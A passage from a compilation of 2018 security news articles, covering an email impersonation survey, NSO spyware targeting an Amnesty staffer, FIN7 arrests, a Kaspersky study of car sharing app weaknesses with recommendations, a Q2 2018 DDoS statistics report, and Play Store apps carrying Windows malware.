Impersonation attacks are an acknowledged and growing email threat. The top five currently-used technologies to prevent these are anti-spam/phishing filters (63%), secure email gateways (53%), SIEMs (44%), DMARC (39%), and anti-phish training (30%). Use of all of these is expected to grow over the next 12 months: filters by 2%, SEGs by 10%, SIEMs by 3%, DMARC by 9%, and phish training by a colossal 27%.

These figures simply indicate that use of existing technologies that have currently failed to prevent the email start-point in 96% or all security breaches will be increased. This doesn't mean, however, that the respondents have abandoned hope in their ability to improve things. Asked what effect a 20% increase in their email security budget would have, the reply was a 45% improvement in the detection rate with a 33% improvement in the prevention rate.

"With the dramatic rise in impersonation attacks as a primary vector for cyberattacks, companies are re-assessing the balance of their security efforts,” said Alexander García-Tobar, CEO and co-founder of Valimail.

“While traditional approaches are good for filtering malicious content and blocking spam, impersonation attacks can only be stopped with email anti-impersonation solutions. Individuals at all levels of a company, including customers and clients, are vulnerable to phishing, fraud, and impersonation attacks. Companies can strengthen their security against email fraud with automated solutions and close that disconnect between email threats and preventive action," he added

What surprises Ponemon, however, is the current lack of adoption of such automated solutions. "We were surprised to see a vast majority of companies who believe that they have had a breach involving email but are not yet embracing automated anti-impersonation solutions to protect themselves proactively,” said Dr. Larry Ponemon, chairman and founder of Ponemon Institute. “Adopting fully automated solutions for DMARC enforcement that provide email authentication will help companies get ahead of the attackers and build trust with their clients and end users."

Human Rights Group: Employee Targeted With Israeli Spyware
2.8.2018 securityweek

LONDON (AP) — An Amnesty International employee has been targeted with Israeli-made surveillance software, the human rights group said Wednesday, adding to a growing number of examples of Israeli technology being used to spy on human rights workers and opposition figures in the Middle East and beyond.

In a 20-page report, Amnesty outlined how it thinks a hacker tried to break into an unidentified staff member's smartphone in early June by baiting the employee with a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

The London-based human rights organization said it traced the malicious link in the message to a network of sites tied to the NSO Group, an Israeli surveillance company implicated in a series of digital break-in attempts, including a campaign to compromise proponents of a soda tax in Mexico and an effort to hack into the phone of an Arab dissident that prompted an update to Apple's operating system.

Joshua Franco, Amnesty's head of technology and human rights, said the latest hacking attempt was emblematic of the increased digital risk faced by activists worldwide.

"This is the new normal for human rights defenders," Franco said.

NSO said in a written statement that its product was "intended to be used exclusively for the investigation and prevention of crime and terrorism" and that allegations of wrongdoing would be investigated. In response to a series of written questions, the company said past allegations of customer misuse had, in an undisclosed number of cases, led to the termination of contracts.

Amnesty's findings were corroborated by internet watchdog Citizen Lab, which has been tracking NSO spyware for two years and is based at the University of Toronto's Munk School of Global Affairs.

In its own report being released Wednesday, Citizen Lab said it so far had counted some 175 targets of NSO spyware worldwide, including 150 people in Panama identified as part of a massive domestic espionage scandal swirling around the country's former president.

The Amnesty International report said the organization identified a second human rights activist, in Saudi Arabia, who was targeted in a similar way to its staffer. Citizen Lab said it found traces of similar hacking attempts tied to Qatar or Saudi, hinting at the use of the Israeli spyware elsewhere in the Gulf.

Any possible use of Israeli technology to police dissent in the Arab world could raise uncomfortable questions both for Israel, which still sees itself as a bastion of democracy in the region, and for countries with no formal diplomatic ties to the Jewish state.

For Amnesty's Franco, it was a sign of an out-of-control trade in high-tech surveillance tools.

"This is a huge market that's completely opaque and under-regulated," he said.

Three Ukrainians Arrested for Hacking Over 100 US Companies
2.8.2018 securityweek Crime

Three Ukrainians have been arrested for hacking more than 100 US companies and stealing millions of customer records, the Department of Justice announced Wednesday.

Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kopakov, 30, were members of a "sophisticated international cybercrime group" called "FIN7," the department said in a statement.

"Since at least 2015, FIN7 members engaged in a highly sophisticated malware campaign targeting more than 100 US companies, predominantly in the restaurant, gaming, and hospitality industries," it said.

"FIN7 hacked into thousands of computer systems and stole millions of customer credit and debit card numbers, which the group used or sold for profit," it said.

The Justice Department said members of the "prolific hacking group" also targeted computer networks in Britain, Australia, and France.

FBI special agent Jay Tabb told a press conference in Seattle, Washington, where the arrests were announced, that the hacking was not state-sponsored.

"No linkage at all to any state-sponsored activity," Tabb said. "This is just old-fashioned organized crime."

Fedorov, a "high-level hacker and manager," was arrested in Bielsko-Biala, Poland, in January and is being detained pending extradition to the United States, the Department of Justice said.

Hladyr, FIN7's systems administrator, was arrested in Dresden, Germany, in January, it said, and is being held in Seattle, Washington, pending a trial scheduled to open on October 22.

Kolpakov, described as a "supervisor of a group of hackers," was arrested in Lepe, Spain, in late June and is being detained there pending a US extradition request, the department said.

- Chipotle, Arby's targeted -

"Cyber criminals who believe that they can hide in faraway countries and operate from behind keyboards without getting caught are just plain wrong," said Annette Hayes, US Attorney for the Western District of Washington.

The charges against the three were contained in federal indictments unsealed on Wednesday.

They were charged with 26 counts of conspiracy, wire fraud, computer hacking, access device fraud, and aggravated identity theft.

The Justice Department said that FIN7 also known as the "Carbanak Group" and the "Navigator Group," breached computer networks of companies in 47 US states and Washington DC.

They allegedly stole "more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations."

Among the companies which have publicly disclosed hacks by FIN7 are Chipotle Mexican Grill, Chili's, Arby's, Red Robin and Jason's Deli, the Justice Department said.

Many of the businesses were targeted through phishing schemes involving email.

"FIN7 carefully crafted email messages that would appear legitimate to a business' employee, and accompanied emails with telephone calls intended to further legitimize the email," it said.

Once an attached file was opened, it would trigger malware to steal payment card data which was sold on online underground marketplaces.

A study of car sharing apps
2.8.2018 Kaspersky  Mobil

The growing popularity of car sharing services has led some experts to predict an end to private car ownership in big cities. The statistics appear to back up this claim: for example, in 2017 Moscow saw the car sharing fleet, the number of active users and the number of trips they made almost double. This is great news, but information security specialists have started raising some pertinent questions: how are the users of these services protected and what potential risks do they face in the event of unauthorized access to their accounts?

Why is car sharing of interest to criminals?
The simple answer would be because they want to drive a nice car at somebody else’s expense. However, doing so more than once is likely to be problematic – once the account’s owner finds out they have been charged for a car they never rented, they’ll most likely contact the service’s support line, the service provider will check the trip details, and may eventually end up reporting the matter to the police. It means anyone trying it a second time will be tracked and caught red-handed. This is obvious and makes this particular scenario the least likely reason for hijacking somebody’s account.

The selling of hijacked accounts appears to be a more viable reason. There is bound to be demand from those who don’t have a driving license or those who were refused registration by the car sharing service’s security team. Indeed, offers of this nature already exist on the market.

Criminals offer hijacked accounts from a wide range of car sharing services…

…and explain why you are better off using somebody else’s account

In addition, someone who knows the details of a user’s car sharing account can track all their trips and steal things that are left behind in the car. And, of course, a car that is fraudulently rented in somebody else’s name can always be driven to some remote place and cannibalized for spare parts.

Application security
So, we know there is potential interest among criminal elements; now let’s see if the developers of car sharing apps have reacted to it. Have they thought about user security and protected their software from unauthorized access? We tested 13 mobile apps and (spoiler alert!) the results were not very encouraging.

We started by checking the apps’ ability to prevent launches on Android devices with root privileges, and assessed how well the apps’ code is obfuscated. This was done for two reasons:

the vast majority of Android applications can be decompiled, their code modified (e.g. so that user credentials are sent to a C&C), then re-assembled, signed with a new certificate and uploaded again to an app store;
an attacker on a rooted device can infiltrate the process of the necessary application and gain access to authentication data.
Another important security element is the ability to choose a username and password when using a service. Many services use a person’s phone number as their username. This is quite easy for cybercriminals to obtain as users often forget to hide it on social media, while car sharing users can be identified on social media by their hashtags and photos.

An example of how a social media post can give you away

We then looked at how the apps work with certificates and if cybercriminals have any chance of launching successful MITM attacks. We also checked how easy it is to overlay an application’s interface with a fake authorization window.

Reverse engineering and superuser privileges
Of all the applications we analyzed, only one was capable of countering reverse engineering. It was protected with the help of DexGuard, a solution whose developers also promise that protected software will not launch on a device where the owner has gained root privileges or that has been modified (patched).

File names in the installation package indicate the use of DexGuard

However, while that application is well protected against reverse engineering, there’s nothing to stop it from launching on an Android device with superuser privileges. When tested that way, the app launches successfully and goes through the server authorization process. An attacker could obtain the data located in protected storage. However, in this particular app the data was encrypted quite reliably.

Example of user’s encrypted credentials

Password strength
Half the applications we tested do not allow the user to create their own credentials; instead they force the user to use their phone number and a PIN code sent in a text message. On the one hand, this means the user can’t set a weak password like ‘1234’; on the other hand, it presents an opportunity for an attacker to obtain the password (by intercepting it using the SS7 vulnerability, or by getting the phone’s SIM card reissued). We decided to use our own accounts to see how easy it is to find out the ‘password’.

If an attacker finds a person’s phone number on social media and tries to use it to log in to the app, the owner will receive an SMS with a validation code:

As we can see, the validation code is just four digits long, which means it only takes 10,000 attempts to guess it – not such a large number. Ideally, such codes should be at least six digits long and contain upper and lower case characters as well as numbers.

Another car sharing service sends stronger passwords to users; however, there is a drawback to that as well. Its codes are created following a single template: they always have numbers in first and last place and four lower-case Latin characters in the middle:

That means there are 45 million possible combinations to search through; if the positioning of the numbers were not restricted, the number of combinations would rise to two billion. Of course, 45,000,000 is also large amount, but the app doesn’t have a timeout for entering the next combination, so there are no obstacles to prevent brute forcing.

Now, let’s return to the PIN codes of the first application. The app gives users a minute to enter the PIN; if that isn’t enough time, users have to request a new code. It turned out that the combination lifetime is a little over two minutes. We wrote a small brute force utility, reproduced part of the app/server communication protocol and started the brute force. We have to admit that we were unable to brute force the code, and there are two possible reasons for that. Firstly, our internet line may have been inadequate, or secondly, the car sharing operator set an appropriate two-minute timeout for the PIN code, so it couldn’t be brute forced within two minutes even with an excellent internet connection. We decided not to continue, confirming only that the service remained responsive and an attack could be continued after several attempts at sending 10,000 requests at a time.

While doing so, we deliberately started the brute force in a single thread from a single IP address, thereby giving the service a chance to detect and block the attack, contact the potential victim and, as a last resort, deactivate the account. But none of these things happened. We decided to leave it at that and moved on to testing the next application.

We tried all the above procedures on the second app, with the sole exception that we didn’t register a successful brute force of the password. We decided that if the server allows 1,000 combinations to be checked, it would probably also allow 45 million combinations to be checked, so it is just a matter of time.

The server continues to respond after 1,000 attempts to brute force the password

This is a long process with a predictable result. This application also stores the username and password locally in an encrypted format, but if the attacker knows their format, brute forcing will only take a couple of minutes – most of this time will be spent on generating the password/MD5 hash pair (the password is hashed with MD5 and written in a file on the device).

MITM attack
It’s worth noting that the applications use HTTPS to communicate data to and from their control centers, so it may take quite a while to figure out the communication protocol. To make our ‘attack’ faster, we resorted to an MITM attack, aided by another global security flaw: none of the tested applications checks the server’s certificate. We were able to obtain the dump of the entire session.

Screenshot of a successful MITM attack. HTTPS traffic dump was obtained

Protection from overlaying
Of course, it’s much faster and more effective (from the attacker’s point of view) if an Android device can be infected, i.e., the authorization SMS can be intercepted, so the attacker can instantly log in on another device. If there’s a complex password, then the attacker can hijack the app’s launch by showing a fake window with entry fields for login details that covers the genuine app’s interface. None of the applications we analyzed could counter this sort of activity. If the operating system version is old enough, privileges can be escalated and, in some cases, the required data can be extracted.

The situation is very similar to what we found surrounding Connected Car applications. It appears that app developers don’t fully understand the current threats to mobile platforms – that goes for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying users of suspicious activities – only one service currently sends notifications to users about attempts to log in to their account from a different device. The majority of the applications we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code.

Russian car sharing operators could learn a thing or two from their colleagues in other countries. For example, a major player in the market of short-term car rental only allows clients to access a car with a special card – this may make the service less convenient, but dramatically improves security.

Advice for users
Don’t make your phone number publicly available (the same goes for your email address)
Use a separate bank card for online payments, including car sharing (a virtual card also works) and don’t put more money on it than you need.
If your car sharing service sends you an SMS with a PIN code for your account, contact the security service and disconnect your bank card from that account.
Do not use rooted devices.
Use a security solution that will protect you from cybercriminals who steal SMSs. This will make life harder not only for free riders but also for those interested in intercepting SMSs from your bank.
Recommendations to car sharing services
Use commercially available packers and obfuscators to complicate reverse engineering. Pay special attention to integrity control, so the app can’t be modified.
Use mechanisms to detect operations on rooted devices.
Allow the user to create their own credentials; ensure all passwords are strong.
Notify users about successful logons from other devices.
Switch to PUSH notifications: it’s still rare for malware to monitor the Notification bar in Android.
Protect your application interface from being overlaid by another app.
Add a server certificate check.

DDoS attacks in Q2 2018
2.8.2018 Kaspersky  Attack

News overview
Q2 2018 news includes: non-standard use of old vulnerabilities, new botnets, the cutthroat world of cryptocurrencies, a high-profile DDoS attack (or not) with a political subtext, the slashdot effect, some half-baked attempts at activism, and a handful arrests. But first things first.

Knowing what we know about the devastating consequences of DDoS attacks, we are not inclined to celebrate when our predictions come true. Alas, our forecast in the previous quarter’s report was confirmed: cybercriminals continue to seek out new non-standard amplification methods. Even before the panic over the recent wave of Memcached-based attacks had subsided, experts discovered an amplification method using another vulnerability—in the Universal Plug and Play protocol, known since 2001. It allows garbage traffic to be sent from several ports instead of just one, switching them randomly, which hinders the blocking process. Experts reported two attacks (April 11 and 26) in which this method was likely used; in the first instance, the DNS attack was amplified through UPnP, and in the second the same was applied to an NTP attack. In addition, the Kaspersky DDoS Protection team observed an attack that exploited a vulnerability in the CHARGEN protocol. A slightly weaker attack using the same protocol to amplify the flood (among other methods) targeted the provider ProtonMail, the reason for which was an unflattering comment made by the company’s executive director.

New botnets are causing more headaches for cybersecurity specialists. A noteworthy case is the creation of a botnet formed from 50,000 surveillance cameras in Japan. And a serious danger is posed by a new strain of the Hide-n-Seek malware, which was the first of all known bots to withstand, under certain circumstances, a reboot of the device on which it had set up shop. True, this botnet has not yet been used to carry out DDoS attacks, but experts do not rule out such functionality being added at a later stage, since the options for monetizing the botnet are not that many.

One of the most popular monetization methods remains attacking cryptocurrency sites and exchanges. What’s more, DDoS attacks are used not only to prevent competitors from increasing their investors, but as a way of making a big scoop. The incident with the cryptocurrency Verge is a case in point: in late May, a hacker attacked Verge mining pools, and made off with XVG 35 million ($1.7 million). In the space of two months, the currency was hacked twice, although the preceding attack was not a DDoS.

Not only that, June 5 saw cybercriminals bring down the Bitfinex cryptocurrency exchange, with the system crash followed by a wave of garbage traffic, pointing to a multistage attack that was likely intended to undermine credibility in the site. It was probably competitive rivalry that caused the renowned online poker site, Americas Cardroom, to suffer a DDoS attack that forced first the interruption and then cancellation of a tournament. That said, it was rumored that the attack could have been a political protest against the in-game availability of Donald Trump and Kim Jong Un avatars.

As always, the most media hype in the past quarter was generated by politically motivated DDoS attacks. In mid-April, British and US law enforcement bodies warned that a significant number of devices had been seized by Russian (supposedly Kremlin-sponsored) hackers in the US, the EU, and Australia with a view to carrying out future attacks. Then just a few days later, in late April, it was a Russian target that got hit: the site of the largest Russian political party, United Russia, was down for two whole days, yet there was precious little public speculation about the masterminds behind the DDoS campaign.

An attack on the Danish railway company DSB, which struggled to serve passengers for several days as a result, was also alleged to be politically motivated. Some see it as a continuation of the attack on Swedish infrastructure last fall.

At the end of the quarter, attention was focused on the Mexican elections and an attack on an opposition party website hosting materials about the illegal activities of a rival. According to the victim, the attack began during a pre-election debate when the party’s candidate showed viewers a poster with the website address. However, it was immediately rumored that DDoS was not the culprit, but the Slashdot effect, which Reddit users also call “the hug of death.” This phenomenon has been around since the dawn of the Internet, when bandwidth was a major issue. But it’s still encountered to this day when a small resource suffers a major influx of legitimate web traffic on the back of media hype.

The Slashdot effect was also observed by the Kaspersky DDoS Protection team in early summer. After a press conference by the Russian president, a major news outlet covering the event experienced a powerful wave of tens of thousands of HTTP GET requests all sent simultaneously. The size of the supposed botnet suggested a new round of attacks involving IoT devices, but further analysis by KDP experts showed that all suspicious queries in the User Agent HTTP header contained the substring “XiaoMi MiuiBrowser”. In fact, owners of Xiaomi phones with the browser app installed received a push notification about the outcome of the conference, and it seems that many took an interest and followed the link, causing a glut of requests.

Meanwhile, law enforcement agencies have been making every effort to prevent organized attacks: in late April, Europol managed to shut down Webstresser.org, the world’s largest DDoS-for-hire service. When it was finally blocked, the portal had more than 136,000 users and had served as the source of more than 4 million DDoS attacks in recent years. After the fall of Webstresser, conflicting trends were reported: some companies observed a significant decline in DDoS activity in Europe (although they warned that the drop was going to be relatively short-lived); others, however, pointed to a rise in the number of attacks across all regions, which may have been the result of attackers seeking to compensate by creating new botnets and expanding old ones.

On top of that, several DDoS attack masterminds were caught and convicted. German hacker ZZboot was sentenced for attacking major German and British firms with ransom demands. However, he avoided jail time, receiving 22 months of probation. At the other end of the Eurasian continent, in Taipei, a hacker named Chung was arrested for allegedly attacking the Taiwan Bureau of Investigation, the Presidential Administration, Chungwa Telecom, and the Central Bank. In the other direction, across the pond, a self-proclaimed hacktivist was arrested in the US for obstructing the work of police in Ohio.

Another, less significant, but more curious arrest took place in the US: an amateur hacker from Arizona was arrested, fined, and jailed after an online acquaintance posted a tweet with his name. Despite his rudimentary skills, the cybercriminal, calling himself the “Bitcoin Baron,” had terrorized US towns for several years, crashing the websites of official institutions and demanding ransoms; in one incident, his actions seriously hindered emergency response services. He too tried to position himself as a cyberactivist, but his bad behavior ruined any reputation he might have had, especially his alleged (only by himself, it should be said) attempt to bring down the site of a children’s hospital by flooding it with child pornography.

Quarter trends
In H1 2018, the average and maximum attack power fell significantly compared to H2 2017. This can be explained by the seasonal slowdown that is usually observed at the start of the year. However, a comparison of H1 indicators for 2017 and 2018 shows a measurable rise in attack power since last year.

Change in DDoS attack power, 2017-2018

One way to increase the attack power is third-party amplification. As mentioned in the news overview, hackers continue to look for ways to amplify DDoS attacks through new (or well-forgotten old) vulnerabilities in widely popular software, not without success, unfortunately. This time, the KDP team detected and repelled an attack with a capacity in the tens of Gbit/s that exploited a vulnerability in the CHARGEN protocol—an old and very simple protocol described in RFC 864 way back in 1983.

CHARGEN was intended for testing and measurement purposes, and can listen on both the TCP and UDP sockets. In UDP mode, the CHARGEN server responds to any request with a packet with a string length from 0 to 512 random ASCII characters. Attackers use this mechanism to send requests to the vulnerable CHARGEN server, where the outgoing address is substituted by the address of the victim. US-CERT estimates the amplification factor at 358.8x, but this figure is somewhat arbitrary, since the responses are generated randomly.

Despite the protocol’s age and limited scope, many open CHARGEN servers can be found on the Internet. They are mainly printers and copying devices in which the network service is enabled by default in the software.

The use of CHARGEN in UDP attacks, as reported by KDP and other providers (Radware, Nexusguard), may indicate that attacks using more convenient protocols (for example, DNS or NTP) are becoming less effective, since there exist well-developed methods to combat this kind of UDP flooding. But the simplicity of such attacks makes cybercriminals unwilling to abandon them; instead they hope that modern security systems will not be able to resist antiquated methods. And although the search for non-standard holes will doubtless continue, CHARGEN-type amplification attacks are unlikely to take the world by storm, since vulnerable servers lack a source of replenishment (how often are old copiers connected to the Internet?).

If cybercriminals are going retro in terms of methods, when it comes to targets they are breaking new ground. DDoS attacks against home users are simple, but not profitable, whereas attacks on corporations are profitable, but complex. Now DDoS planners have found a way to get the best of both worlds—in the shape of the online games industry and streamers. Let’s take as an example the growing popularity of e-sports tournaments, in which the victors walk away with tens—sometimes hundreds—of thousands of dollars. The largest events are usually held at special venues with specially setup screens and stands for spectators, but the qualifying rounds to get there often involve playing from home. In this case, a well-planned DDoS attack against a team can easily knock it out of the tournament at an early stage. The tournament server might also be targeted, and the threat of disruption could persuade the competition organizers to pay the ransom. According to Kaspersky Lab client data, DDoS attacks on e-sports players and sites with the goal of denying access are becoming increasingly common.

Similarly, cybercriminals are trying to monetize the market of video game streaming channels. Streaming pros show live playthroughs of popular games, and viewers donate small sums to support them. Naturally, the larger the audience, the more money the streamer gets for each broadcast; top players can earn hundreds or thousands of dollars, which basically makes it their job. Competition in this segment is fierce and made worse by DDoS attacks with the capacity to interfere with livestreams, causing subscribers to look for alternatives.

Like e-sports players, home streamers have virtually no means of protection against DDoS attacks. They are essentially reliant on their Internet provider. The only solution at present could be to set up specialized platforms offering greater protection.

Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor the actions of botnets using the Kaspersky DDoS Intelligence system.

The DDoS Intelligence system is part of the Kaspersky DDoS Protection solution, and intercepts and analyzes commands sent to bots from C&C servers. What’s more, the system is proactive, not reactive—there’s no need to wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q2 2018.

In the context of this report, it is assumed that an incident is a separate (single) DDoS-attack if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this incident is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools for performing DDoS attacks, and that the data presented in this report do not cover every single DDoS attack that occurred during the period under review.

Quarter results
The stormiest period for DDoS attacks was the start of the quarter, particularly mid-April. By contrast, late May and early June were fairly quiet.
Top spot in terms of number of attacks was retained by China (59.03%), with Hong Kong (17.13%) in second. It also entered the Top 3 by number of unique targets with 12.88%, behind only China (52.36%) and the US (17.75%).
The attacks were quite evenly distributed across the days of the week. The most and least popular were Tuesday and Thursday, respectively, but the difference is slight.
The share of SYN attacks rose sharply to 80.2%; second place went to UDP attacks with 10.6%.
The share of attacks from Linux botnets increased significantly to 94.47% of all single-family attacks.
Geography of attacks
The latest quarter threw up a number of surprises. The leader by number of attacks is still China, with its share practically unchanged (59.03% against 59.42% in Q1). However, for the first time since monitoring began, Hong Kong broke into the Top 3, rising from fourth to second: its share increased almost fivefold, from 3.67% to 17.13%, squeezing out the US (12.46%) and South Korea (3.21%), whose shares declined by roughly 5 p.p. each.

Another surprise package in the territorial ranking was Malaysia, which shot up to fifth place, now accounting for 1.30% of all DDoS attacks. It was joined in the Top 10 by Australia (1.17%) and Vietnam (0.50%), while the big-hitters Japan, Germany, and Russia all dropped out. Britain (0.50%) and Canada (0.69%) moved into eighth and seventh, respectively.

The Top 10 in Q2 also had a greater share of the total number of attacks than in Q1: 96.44% compared with 95.44%.

Distribution of DDoS attacks by country, Q1 and Q2 2018

The territorial distribution of unique targets roughly corresponds to the distribution of the number of attacks: China has the largest share (52.36%), a rise of 5 p.p. against the previous quarter. Second place belongs to the US (17.5%) and third to Hong Kong (12.88%), up from fourth, replacing South Korea (4.76%) (note that in Hong Kong the most popular targets are now Microsoft Azure servers). Britain fell from fourth to eighth, now accounting for 0.8% of unique targets.

The Top 10 said goodbye to Japan and Germany, but welcomed Malaysia (2.27%) in fourth place and Australia (1.93%) just behind in fifth. This quarter’s Top 10 accounted for slightly more of the total number of unique attacks, reaching 95.09% against 94.17% in Q1.

Distribution of unique DDoS-attack targets by country, Q1 and Q2 2018

Dynamics of the number of DDoS attacks
Peak activity in Q2 2018 was observed in mid-April: a significant increase in the number of attacks was registered in the middle third of this month, with two large spikes occurring just days apart: April 11 (1163) and April 15 (1555). The quarter’s deepest troughs came in the second half and at the end: the calmest days were May 24 (13) and June 17 (16).

Dynamics of the number of DDoS attacks, Q2 2018

In Q2 2018, Sunday went from being the quietest day for cybercriminals to the second most active: it accounted for 14.99% of attacks, up from 10.77% in the previous quarter. But gold in terms of number of attacks went to Tuesday, which braved 17.49% of them. Thursday, meanwhile, went in the opposite direction: only 12.75% of attacks were logged on this day. Overall, as can be seen from the graph, in the period April-June the attack distribution over the days of the week was more even than at the beginning of the year.

Distribution of DDoS attacks by day of the week, Q1 and Q2 2018

Duration and types of DDoS attacks
The longest attack in Q2 lasted 258 hours (almost 11 days), slightly short of the previous quarter’s record of 297 hours (12.4 days). This time, the focus of persevering hackers was an IP address belonging to China Telecom.

Overall, the share of long-duration attacks fell by 0.02 p.p. to 0.12%. Whereas the share of attacks lasting from 100 to 139 hours remained the same, the share of attacks from 10 to 50 hours almost doubled (from 8.28% to 16.27%); meanwhile, the share of attacks lasting from five to nine hours increased nearly by half (from 10.73% to 14.01%). The share of short-duration attacks (up to four hours) fell sharply from 80.73% in January to 69.49% in March.

Distribution of DDoS attacks by duration (hours), Q1 and Q2 2018

All other types of attacks decreased in share; UDP attacks are in second place (10.6%), while TCP, HTTP, and ICMP constitute a relatively small proportion.

Distribution of DDoS attacks by type, Q2 2018

Correlation between Windows- and Linux-based botnet attacks, Q2 2018

Geographical distribution of botnets
The Top 10 regions by number of botnet C&C servers underwent some significant changes. Top spot went to the US with almost half of all C&C centers (44.75% against 29.32% in Q1). South Korea (11.05%) sank from first to second, losing nearly 20 p.p. China also dropped significantly (from 8.0% to 5.52%). Its place was taken by Italy, whose share climbed from 6.83% in the previous quarter to 8.84%. The Top 10 saw the departure of Hong Kong, but was joined—for the first time since our records began—by Vietnam, whose 3.31% was good enough for seventh place.

Distribution of botnet C&C servers by country, Q2 2018

In Q2 2018, cybercriminals continued the above-outlined trend of searching for exotic holes in UDP transport protocols. It surely won’t be long before we hear about other sophisticated methods of attack amplification.

Another technical discovery of note is the potential for creating botnets using the UPnP protocol; although evidence for them exists, they are still extremely rare in the wild, fortunately.

Windows botnet activity decreased: in particular, Yoyo activity experienced a multifold drop, and Nitol, Drive, and Skill also declined. Meanwhile, Xor for Linux significantly increased its number of attacks, while another infamous Linux botnet, Darkai, scaled back slightly. As a result, the most popular type of attack was SYN flooding.

The total attack duration changed little since the previous quarter, but the share of medium-duration attacks increased, while the share of shorter ones decreased. The intensity of attacks also continues to grow. The most lucrative targets for cybercriminals seem to be cryptocurrencies, but we can soon expect to see high-profile attacks against e-sports tournaments as well as relatively small ransoms targeting individual streamers and players. Accordingly, there will be market demand for affordable individual anti-DDoS protection.

Amnesty International employee targeted with NSO group surveillance malware
2.8.2018 securityweek 

An employee at Amnesty International has been targeted with Israeli surveillance malware, the news was revealed by the human rights group.
Amnesty International revealed that one of its employees was targeted with a surveillance malware developed by an Israeli firm.

The human rights group published a report that provides details on the attack against its employee. The hacker attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

This SMS message translates to:

“Court order #XXXXXX issued against identity owner **** on XX/XX/XXX”


surveillance Amnesty International NGO spyware

The organization added that such kind of attacks is becoming even more frequent, a growing number of Israeli surveillance software being used to spy on human rights operators and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

“In June 2018, an Amnesty International staff member received a malicious WhatsApp message with Saudi Arabia-related bait content and carrying links Amnesty International believes are used to distribute and deploy sophisticated mobile spyware. Through the course of our subsequent investigation we discovered that a Saudi activist based abroad had also received similar malicious messages.” reads the report published Amnesty International.

“In its analysis of these messages, Amnesty International found connections with a network of over 600 domain names. Not only are these domain names suspicious, but they also overlap with infrastructure that had previously been identified as part of Pegasus, a sophisticated commercial exploitation and spyware platform sold by the Israel surveillance vendor, NSO Group.”

The servers identified by the experts were matching NSO Group’s description of Pegasus in the Hacking Team leaked document, they found two other connections to NSO Group:

evidence that connects the malicious links used by the attackers and collected with NSO Group network infrastructure that was previously detailed by researchers at Citizen Lab.
a domain registration pattern showing that most of the domains in the NSO Group infrastructure were registered during Israeli working days and hours.
“With the technique we developed, we were then able to identify over 600 servers that demonstrated similar behavior. Among these we found servers that hosted domain names that have been previously identified as connected to NSO Group by Citizen Lab and others, specifically banca-movil[.]com, pine-sales[.]com, and ecommerce-ads[.]org.” continues the report.

There are several companies that develop surveillance platforms for targeting mobile devices, the NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International was corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.

“Amnesty International shared the suspicious messages with us and asked us to verify their findings, as we have been tracking infrastructure that appears to be related to NSO Group’s Pegasus spyware since March 2016.” reads the analysis published by Citizen Lab.

“Based on our analysis of the messages sent to these individuals, we can corroborate Amnesty’s findings that the SMS messages contain domain names pointing to websites that appear to be part of NSO Group’s Pegasus infrastructure.”

Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

Panama Up to 150 (Source: Univision)1 2012-2014
UAE 1 (Source: Citizen Lab) 2016
Mexico 22 (Source: Citizen Lab) 2016
Saudi Arabia 2 (Source: Amnesty, Citizen Lab) 2018
Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, recent discovery demonstrates that trading of surveillance software is going out-of-control.

“This is a huge market that’s completely opaque and under-regulated,” he concluded.

Hundreds of apps removed from Google Play store because were carrying Windows malware
2.8.2018 securityweek Android

Google recently removed 145 applications from the official Google Play store because they were found to carry malicious Windows executables inside.
Researchers from Palo Alto Networks revealed that Google removed more than 145 apps from the Play store because they were carrying a Windows malware,

The apps were uploaded to the Google Play store between October and November 2017, this means that for months Android users were exposed to the attack. In some cases, the apps have been downloaded thousands of times and were rated with 4-stars.

The malicious code included in the code of the app was developed to compromised Windows systems and leverage the Android device as an attack vector.

“Notably, the infected APK files do not pose any threat to Android devices, as these embedded Windows executable binaries can only run on Windows systems: they are inert and ineffective on the Android platform.” reads the analysis published by Palo Alto networks.

“The fact that these APK files are infected indicates that the developers are creating the software on compromised Windows systems that are infected with malware. This type of infection is a threat to the software supply chain, as compromising software developers has proven to be an effective tactic for wide scale attacks.”

Palo Alto Networks reported that the malicious PE files when executed on a Windows system will perform these suspicious activities:

Creates executable and hidden files in Windows system folders, including copying itself
Changes Windows registry to auto-start themselves after restarting
Attempts to sleep for a long period
Has suspicious network connection activities to IP address via port 8829
Some of the apps included multiple malicious PE files at different locations, with different file names, anyway the experts the experts noticed that malware were found embedded in most applications.

The researchers discovered that one of malware was included in 142 APKs, a second malicious code was found in 21 APKs. 15 apps were found containing both PE files inside.

In one case, the malicious PE file that was included in the APK of most of the Android apps was a keylogger.

